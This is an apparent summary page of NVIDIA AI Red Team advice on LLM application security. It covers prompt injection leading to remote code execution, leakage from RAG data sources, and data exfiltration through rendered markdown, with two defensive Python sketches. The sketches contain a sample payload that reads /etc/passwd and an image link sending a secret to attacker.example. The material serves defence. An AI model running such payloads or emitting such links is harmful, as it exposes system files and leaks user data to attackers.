Practical LLM Security Advice from the NVIDIA AI Red Team - NVIDIA Developer
The NVIDIA AI Red Team identifies critical vulnerabilities in LLM applications: remote code execution (RCE), reachable via prompt injection, when unsandboxed LLM-generated code is executed; data leakage and indirect prompt injection through insecure access controls on Retrieval-Augmented Generation (RAG) data sources; and data exfiltration enabled by active content rendered in LLM outputs.
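To illustrate the first risk, here is a minimal sketch (not from the report) of why passing LLM output to `eval()` invites RCE, and one narrow mitigation when only structured data is expected: Python's `ast.literal_eval` accepts literals but rejects code. The `llm_output` payload and `parse_literal` helper are hypothetical.

```python
import ast

# Hypothetical attacker-steered LLM output: prompt injection can make the
# model emit code instead of the data the application expects.
llm_output = "__import__('os').system('cat /etc/passwd')"

# UNSAFE pattern (do not do this): eval() would execute the payload.
# eval(llm_output)

def parse_literal(text):
    """Parse only Python literals (lists, dicts, numbers, strings).

    ast.literal_eval raises on anything code-bearing, so the attacker
    payload above is rejected instead of executed.
    """
    try:
        return ast.literal_eval(text)
    except (ValueError, SyntaxError):
        return None

assert parse_literal(llm_output) is None          # payload rejected
assert parse_literal("[1, 2, 3]") == [1, 2, 3]    # plain data still parses
```

Note this only helps when the application expects data, not code; when LLM-generated code must actually run, it needs a real sandbox (separate process, container, or VM with restricted privileges).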
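For the exfiltration risk, a common concrete case (assumed here, not spelled out in the summary) is markdown images in LLM output: an injected prompt can make the model emit an image whose URL carries stolen data to an attacker's server, which the client then fetches on render. A minimal sketch of stripping such active content before rendering; the function name and regex are illustrative:

```python
import re

# Matches markdown image syntax: ![alt text](url)
IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\([^)]*\)")

def strip_active_content(markdown: str) -> str:
    """Remove markdown images so rendering cannot trigger outbound requests
    to attacker-controlled URLs embedded by an injected prompt."""
    return IMAGE_PATTERN.sub("[image removed]", markdown)

malicious = "Summary done. ![x](https://attacker.example/log?d=SECRET)"
assert strip_active_content(malicious) == "Summary done. [image removed]"
```

A stricter variant is an allowlist of image origins rather than blanket removal, depending on whether the application legitimately renders images.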
Source: Original Report